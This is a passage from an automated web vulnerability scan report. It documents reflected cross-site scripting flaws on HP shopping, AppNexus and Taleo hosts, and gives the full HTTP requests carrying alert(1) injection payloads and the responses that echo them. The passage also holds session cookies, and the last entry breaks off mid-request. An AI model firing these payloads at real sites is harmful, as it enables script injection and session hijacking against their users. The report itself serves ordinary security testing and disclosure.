GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$bg=HPShopping%2Fwbg3&$dt=is%7BHPShopping%2F%7D34e5f<img%20src%3da%20onerror%3dalert(1)>5a3994af565&$mon=is%7BHPShopping%2F%7D&$fti=is%7BHPShopping%2Fls022av%5F01%5F10%7D&$ftc=HP%20Pavilion%20p6680t&$bdc2=&$hlc2=&$bdc1=Save%20%24320%20including%201GB%20discrete%20graphics%2C%20free%20upgrade%20to%206GB%20of%20memory%20and%201TB%20hard%20drive%2C%20free%20shipping&$hlc1=&$hdl1=Entertainment%20center&$hdl2= HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=landing&landing=desktops
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Mon, 21 Mar 2011 15:50:12 GMT
Date: Mon, 21 Mar 2011 15:50:12 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/}34e5f<img src=a onerror=alert(1)>5a3994af565

2.13. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$fti parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpshopping.speedera.net
Path:	/s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $fti request parameter is copied into the HTML document as plain text between tags. The payload 938e7<img%20src%3da%20onerror%3dalert(1)>766119e2dad was submitted in the $fti parameter. This input was echoed as 938e7<img src=a onerror=alert(1)>766119e2dad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$bg=HPShopping%2Fwbg3&$dt=is%7BHPShopping%2F%7D&$mon=is%7BHPShopping%2F%7D&$fti=is%7BHPShopping%2Fls022av%5F01%5F10%7D938e7<img%20src%3da%20onerror%3dalert(1)>766119e2dad&$ftc=HP%20Pavilion%20p6680t&$bdc2=&$hlc2=&$bdc1=Save%20%24320%20including%201GB%20discrete%20graphics%2C%20free%20upgrade%20to%206GB%20of%20memory%20and%201TB%20hard%20drive%2C%20free%20shipping&$hlc1=&$hdl1=Entertainment%20center&$hdl2= HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=landing&landing=desktops
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 99
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Mon, 21 Mar 2011 15:50:15 GMT
Date: Mon, 21 Mar 2011 15:50:15 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/ls022av_01_10}938e7<img src=a onerror=alert(1)>766119e2dad

2.14. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$mon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpshopping.speedera.net
Path:	/s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $mon request parameter is copied into the HTML document as plain text between tags. The payload a9848<img%20src%3da%20onerror%3dalert(1)>8d664d630ac was submitted in the $mon parameter. This input was echoed as a9848<img src=a onerror=alert(1)>8d664d630ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$bg=HPShopping%2Fwbg3&$dt=is%7BHPShopping%2F%7D&$mon=is%7BHPShopping%2F%7Da9848<img%20src%3da%20onerror%3dalert(1)>8d664d630ac&$fti=is%7BHPShopping%2Fls022av%5F01%5F10%7D&$ftc=HP%20Pavilion%20p6680t&$bdc2=&$hlc2=&$bdc1=Save%20%24320%20including%201GB%20discrete%20graphics%2C%20free%20upgrade%20to%206GB%20of%20memory%20and%201TB%20hard%20drive%2C%20free%20shipping&$hlc1=&$hdl1=Entertainment%20center&$hdl2= HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=landing&landing=desktops
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Mon, 21 Mar 2011 15:50:14 GMT
Date: Mon, 21 Mar 2011 15:50:14 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/}a9848<img src=a onerror=alert(1)>8d664d630ac

2.15. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpshopping.speedera.net
Path:	/s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1e809<img%20src%3da%20onerror%3dalert(1)>cdeb9523dc8 was submitted in the REST URL parameter 5. This input was echoed as 1e809<img src=a onerror=alert(1)>cdeb9523dc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile1e809<img%20src%3da%20onerror%3dalert(1)>cdeb9523dc8?layer=comp&wid=258&hei=130&$bg=HPShopping%2Fwbg3&$dt=is%7BHPShopping%2F%7D&$mon=is%7BHPShopping%2F%7D&$fti=is%7BHPShopping%2Fls022av%5F01%5F10%7D&$ftc=HP%20Pavilion%20p6680t&$bdc2=&$hlc2=&$bdc1=Save%20%24320%20including%201GB%20discrete%20graphics%2C%20free%20upgrade%20to%206GB%20of%20memory%20and%201TB%20hard%20drive%2C%20free%20shipping&$hlc1=&$hdl1=Entertainment%20center&$hdl2= HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=landing&landing=desktops
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 82
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Mon, 21 Mar 2011 15:50:15 GMT
Date: Mon, 21 Mar 2011 15:50:15 GMT
Connection: close

Unable to find /HPShopping/promo3_tile1e809<img src=a onerror=alert(1)>cdeb9523dc8

2.16. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/scp_dt [$scp_fmt$&$pb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpshopping.speedera.net
Path:	/s7d2.scene7.com/is/image/HPShopping/scp_dt

Issue detail

The value of the $scp_fmt$&$pb request parameter is copied into the HTML document as plain text between tags. The payload 6d914<img%20src%3da%20onerror%3dalert(1)>367d5463cb4 was submitted in the $scp_fmt$&$pb parameter. This input was echoed as 6d914<img src=a onerror=alert(1)>367d5463cb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/scp_dt?$scp_fmt$&$pb=is{HPShopping/proc_amd?scl=1}6d914<img%20src%3da%20onerror%3dalert(1)>367d5463cb4&$sid=is{HPShopping/xx091av_main?scl=1} HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/series_can.do;HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054?storeName=computer_store&landing=desktops&a1=Category&v1=High+performance&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 100
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Mon, 21 Mar 2011 15:50:11 GMT
Date: Mon, 21 Mar 2011 15:50:11 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/proc_amd?scl=1}6d914<img src=a onerror=alert(1)>367d5463cb4

2.17. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/scp_dt [$sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpshopping.speedera.net
Path:	/s7d2.scene7.com/is/image/HPShopping/scp_dt

Issue detail

The value of the $sid request parameter is copied into the HTML document as plain text between tags. The payload 8a71c<img%20src%3da%20onerror%3dalert(1)>80d3542b273 was submitted in the $sid parameter. This input was echoed as 8a71c<img src=a onerror=alert(1)>80d3542b273 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/scp_dt?$scp_fmt$&$pb=is{HPShopping/proc_amd?scl=1}&$sid=is{HPShopping/xx091av_main?scl=1}8a71c<img%20src%3da%20onerror%3dalert(1)>80d3542b273 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/series_can.do;HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054?storeName=computer_store&landing=desktops&a1=Category&v1=High+performance&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 104
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Mon, 21 Mar 2011 15:50:12 GMT
Date: Mon, 21 Mar 2011 15:50:12 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/xx091av_main?scl=1}8a71c<img src=a onerror=alert(1)>80d3542b273

2.18. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/scp_dt [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpshopping.speedera.net
Path:	/s7d2.scene7.com/is/image/HPShopping/scp_dt

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 64f7e<img%20src%3da%20onerror%3dalert(1)>17d4e34df60 was submitted in the REST URL parameter 5. This input was echoed as 64f7e<img src=a onerror=alert(1)>17d4e34df60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/scp_dt64f7e<img%20src%3da%20onerror%3dalert(1)>17d4e34df60?$scp_fmt$&$pb=is{HPShopping/proc_amd?scl=1}&$sid=is{HPShopping/xx091av_main?scl=1} HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/series_can.do;HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054?storeName=computer_store&landing=desktops&a1=Category&v1=High+performance&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 77
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Mon, 21 Mar 2011 15:50:13 GMT
Date: Mon, 21 Mar 2011 15:50:13 GMT
Connection: close

Unable to find /HPShopping/scp_dt64f7e<img src=a onerror=alert(1)>17d4e34df60

2.19. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7465b'%3balert(1)//53bea0cc804 was submitted in the redir parameter. This input was echoed as 7465b';alert(1)//53bea0cc804 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=311&inv_code=cm.womensforum&size=300x250&referrer=http%3A%2F%2Fwww.highbeam.com%2Fiframead%2Fdisplay.aspx%3Fsite%3Dgale.hbr.doc%26zone%3Dp5554%26kvps%3Dpage%3Dwall%3Bcat%3Dhbr_99%3Bpub%3Dp5554%3Bpos%3Dr2%3Bchannel%3D1000000025%3Bsz%3D300x250%2C300x600%3Btile%3D2%3Bord%3D19528853%3B%26id%3Dad-r2c6cce%2522%253balert%281%29%2Fc18ae8de3b0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.womensforum%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-28302972_1300725734%2C11e4f07c0988ac7%2CMiscellaneous%2Cax.{PRICEBUCKET}-am.bk-cm.polit_l-cm.rdst11-cm.ent_m-cm.sportsreg-cm.sports_m-cm.educat_m-cm.music_h-dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-bk.rdst2-qc.a-qc.ac-ex.11-ex.6-bz.30-bz.25-bz.ab-bz.ae-bz.51-wfm.hliv_h-wfm.health_h-wfm.difi_h-wfm.epil_h-iblocal.sports_m%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D541263%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.bk%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.rdst11%3Bbtg%3Dcm.ent_m%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_m%3Bbtg%3Dcm.educat_m%3Bbtg%3Dcm.music_h%3Bbtg%3Ddx.13%3Bbtg%3Ddx.4%3Bbtg%3Ddx.1%3Bbtg%3Ddx.2%3Bbtg%3Ddx.6%3Bbtg%3Ddx.12%3Bbtg%3Ddx.15%3Bbtg%3Ddx.22%3Bbtg%3Ddx.26%3Bbtg%3Ddx.28%3Bbtg%3Ddx.30%3Bbtg%3Ddx.31%3Bbtg%3Ddx.34%3Bbtg%3Ddx.36%3Bbtg%3Ddx.5%3Bbtg%3Ddx.ch%3Bbtg%3Ddx.bi%3Bbtg%3Ddx.24%3Bbtg%3Ddx.42%3Bbtg%3Ddx.43%3Bbtg%3Ddx.41%3Bbtg%3Ddx.40%3Bbtg%3Dbk.rdst2%3Bbtg%3Dqc.a%3Bbtg%3Dqc.ac%3Bbtg%3Dex.11%3Bbtg%3Dex.6%3Bbtg%3Dbz.30%3Bbtg%3Dbz.25%3Bbtg%3Dbz.ab%3Bbtg%3Dbz.ae%3Bbtg%3Dbz.51%3Bbtg%3Dwfm.hliv_h%3Bbtg%3Dwfm.health_h%3Bbtg%3Dwfm.difi_h%3Bbtg%3Dwfm.epil_h%3Bbtg%3Diblocal.sports_m%3Bord%3D%5Btimestamp%5D%3F7465b'%3balert(1)//53bea0cc804 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI2AkQChgBIAEoATD17pjsBBD17pjsBBgA; sess=1; uuid2=4470455573253905340; anj=Kfw)nByG2Z*cOUsSbu:)P*yG^Pf$N*)v:[=:5P8mEjEgu9rU?)IUeuI$n5=wPE's.vR.S`2z7>^?G![ihs*GdSbL!=:/`4#fKZ4>o-QTWpG?H4voqs4p@639Ga$)h(nUN>b>)aJVxmXeHrIrj*>W_s8-e`4x7BvJQ(gU0Hd:u!I!bH'.[c#Z.#<Q^PcAV?[Sn!:iq2j9u1grwLOHRLu++6>BQb?($uVz#H6tCSQ]1*vtSx1b:2U-DUB3IP.3*33X-`1NYnOQk)I(xi7JGHUk:HI/ZHL%Vd*J*t/*gqE0oVT+n2CQ)I%yHkbcLh[9k=]]!psi+$8@]ud3y<An0y1ys6h`nI5lrNs!=(tk-lJLA<Zf_^4ntTS64e4:#umZMxM7Gu]mY6PW$1(S61@ZIn`NE9CJmYI<K8r4KukBf+v?lR%ve$7Xqk4S.=f>?AKIMLLRZ]7i$0(n6VWf.1fj7plk55ijgF!BNTc[A9[gLJx<V=%^i+vgI$CfWJ<pXZr[nLEFqPlR3V)tK6wT*pwId01fz-8ZC2hqVL0LDKM)3Euf1qYLk6R*[Z>ybd>It=x2R^x$P-+tV#cxGM(w^5l`W6(Zn:Yz1@sVoTS!ySp^(NB8$L'oJAlJ5g80K#CC!mt`WPkvbx^_wmkjOffRp-eOdzA=KGreo)mwQ<UXwYP>`lNJp'9iYH2J.JZm-8R5-Y:kid?RP`pmYrJtM?FkL8(LW2$Wux8Q*4`f(:0R5jHFg2]:@C<u]=$JPH3KW_Q?M9e/Wc*7=tww`r!?l<=F

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 22-Mar-2011 16:45:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 19-Jun-2011 16:45:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIlIUBEAoYASABKAEwmYGe7AQQmYGe7AQYAA..; path=/; expires=Sun, 19-Jun-2011 16:45:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb680754=5_[r^208WM'3_d6>bPMvjY[IP?enc=uJifG5qy7j-lPKnlvaDrPwAAAEAzMwNApTyp5b2g6z-3mJ8bmrLuP40xF2zcO9cDvNv2i6g_Cj6ZgIdNAAAAAFE_AwA3AQAAZAAAAAIAAABrTwIALGEAAAEAAABVU0QAVVNEACwB-gClGAAAJAcBAgUCAAUAAAAAsiN_QAAAAAA.&tt_code=cm.womensforum&udj=uf%28%27a%27%2C+27%2C+1300725913%29%3Buf%28%27g%27%2C+1079%2C+1300725913%29%3Buf%28%27r%27%2C+151403%2C+1300725913%29%3Bppv%2882%2C+%27276755719998878093%27%2C+1300725913%2C+1311093913%2C+2132%2C+24876%29%3Bppv%2884%2C+%27276755719998878093%27%2C+1300725913%2C+1311093913%2C+2132%2C+24876%29%3Bppv%2811%2C+%27276755719998878093%27%2C+1300725913%2C+1311093913%2C+2132%2C+24876%29%3Bppv%2882%2C+%27276755719998878093%27%2C+1300725913%2C+1311093913%2C+2132%2C+24876%29%3Bppv%2884%2C+%27276755719998878093%27%2C+1300725913%2C+1311093913%2C+2132%2C+24876%29%3Bppv%2887%2C+%27276755719998878093%27%2C+1300725913%2C+1300812313%2C+2132%2C+24876%29%3Bppv%28619%2C+%27276755719998878093%27%2C+1300725913%2C+1300812313%2C+2132%2C+24876%29%3Bppv%28620%2C+%27276755719998878093%27%2C+1300725913%2C+1300812313%2C+2132%2C+24876%29%3Bppv%28621%2C+%27276755719998878093%27%2C+1300725913%2C+1300812313%2C+2132%2C+24876%29%3B&cnd=!ahybKwjUEBDrngkYACCswgEoADGCs-_lmbLuP0ITCAAQABgAIAEo_v__________AUIMCFIQ3YhOGAkgAygCQgwIVBDphTQYBiADKAJIA1AAWKUxYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Tue, 22-Mar-2011 16:45:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 19-Jun-2011 16:45:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)nByG2Z*cOUsSbu:)P*yG^Pf$N*)v:[=:5P8mEjEgu9rU?)IUeuI$n5=wPE's.vR.S`2z7>^?G![ihs*GdSbL!=:/`4#fKZ4>o-QTWpG?H4voqs4p@639Ga$)h(nUN>b>)aJVxmXeHrIrj*>W_s8-e`4x7BvJQ(gU0Hd:u!I!bH'.[c#Z.#<Q^PcAV?[Sn!:iq2j9u1grwLOHRLu++6>BQb?($uVz#H6tCSQ]1*vtSx1b:2U-DUB3IP.3*33X-`1NYnOQk)I(xi7JGHUk:HI/ZHL%Vd*J*t/*gqE0oVT+n2CQ)I%yHkbcLh[9k=]]!psi+$8@]ud3y<An0y1ys6h`nI5lrNs!=(tk-lJLA<Zf_^4ntTS64e4:#umZMxM7Gu]mY6PW$1(S61@ZIn`NE9CJmYI<K8r4KukBf+v?lR%ve$7Xqk4S.=f>?AKIMLLRZ]7i$0(n6VWf.1fj7plk55ijgF!BNTc[A9[gLJx<V=%^i+vgI$CfWJ<pXZr[nLEFqPlR3V)tK6wT*pwId01fz-8ZC2hqVL0LDKM)3Euf1qYLk6R*[Z>ybd>It=x2R^x$P-+tV#cxGM(w^5l`W6(Zn:Yz1@sVoTS!ySp^(NB8$L'oJAlJ5g80K#CC!mt`WPkvbx^_wmkjOffRp-eOdzA=KGreo)mwQ<UXwYP>`lNJp'9iYH2J.JZm-8R5-Y:kid?RP`pmYrJtM?FkL8(LW2$Wux8Q*4`f(:0R5jHFg2]:@C<u]=$JPH3KW_Q?M9e/Wc*7=tww`r!?l<=F; path=/; expires=Sun, 19-Jun-2011 16:45:13 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 21 Mar 2011 16:45:13 GMT
Content-Length: 1150

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.womensforum/;net=cm;u=,cm-28302972_1300725734,11e4f07c0988ac7,Miscellaneous,ax.80-am.bk-cm.polit_l-cm.rdst11-cm.e
...[SNIP]...
;btg=bk.rdst2;btg=qc.a;btg=qc.ac;btg=ex.11;btg=ex.6;btg=bz.30;btg=bz.25;btg=bz.ab;btg=bz.ae;btg=bz.51;btg=wfm.hliv_h;btg=wfm.health_h;btg=wfm.difi_h;btg=wfm.epil_h;btg=iblocal.sports_m;ord=[timestamp]?7465b';alert(1)//53bea0cc804">
...[SNIP]...

2.20. https://icfi.taleo.net/careersection/careersection/privacyagreement/statementBeforeAuthentification.jsf [cshtstate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/careersection/privacyagreement/statementBeforeAuthentification.jsf

Issue detail

The value of the cshtstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67e09'><x%20style%3dx%3aexpression(alert(1))>a9c5de4be33 was submitted in the cshtstate parameter. This input was echoed as 67e09'><x style=x:expression(alert(1))>a9c5de4be33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /careersection/careersection/privacyagreement/statementBeforeAuthentification.jsf;jsessionid=00A3A9C577F898F511628EDF42DFEC62.JB_156269_156275 HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/myjobs.ftl
Cache-Control: max-age=0
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=00A3A9C577F898F511628EDF42DFEC62.JB_156269_156275
Content-Length: 18649

dialogTemplate-dialogFormvmVSIds=H4sIAAAAAAAAAFvzloG1hEFCPzmxKDW1qDg1uSQzP08%2FMy8ltUIvqzitEgDUAUy9IAAAAA%3D%3D&ftlstate=5PZ1Z2Z81Z1Z1Z14Z1Z0Z4qZ1Z0Z1Z1Z8Z8xZ1Z0Z3wZ1Z6Z4dZ1Z0Z0Z1Z0ZrZ1Z8Z1eZ1Z0ZvZ1Z8
...[SNIP]...
fqxQkIV0LtX6E84kSWAvJcwc5Rx5MPOFtE62D4FlJpgVww9O%2FiYkud%2F5R%2B3kHxxMlpe%2Fxq34Lh1jxAj74JUVUrs1SiywqbgLFVF65UKUNmbfkuTfbdyFM2Ls2AOHtrCWCf5URPaGpxpouvQn2X5p%2BF8CcBO%2BZjQAAA%3D%3D&cshtstate=110040%7C67e09'><x%20style%3dx%3aexpression(alert(1))>a9c5de4be33&dialogTemplate-dialogForm%3AflowHeader%3AISWLDMessage=&dialogTemplate-dialogForm%3AflowHeader%3ALogged=false&dialogTemplate-dialogForm%3AflowHeader%3AexpiredSessionUrl=%2Fcareersection%2Ficf_prof_ext
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:33:54 GMT
Server: Taleo Web Server 7
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Cache-Control: private
Set-Cookie: JSESSIONID=00A3A9C577F898F511628EDF42DFEC62.JB_156269_156275
Content-Language: en
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 72265

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html lang="en"><head title="Privacy Agreement" profile
...[SNIP]...
<input type='hidden' name='cshtstate' value='110040|67e09'><x style=x:expression(alert(1))>a9c5de4be33'/>
...[SNIP]...

2.21. https://icfi.taleo.net/careersection/careersection/privacyagreement/statementBeforeAuthentification.jsf [ftlstate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/careersection/privacyagreement/statementBeforeAuthentification.jsf

Issue detail

The value of the ftlstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 215c8'><x%20style%3dx%3aexpression(alert(1))>792fd5d617b was submitted in the ftlstate parameter. This input was echoed as 215c8'><x style=x:expression(alert(1))>792fd5d617b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /careersection/careersection/privacyagreement/statementBeforeAuthentification.jsf;jsessionid=00A3A9C577F898F511628EDF42DFEC62.JB_156269_156275 HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
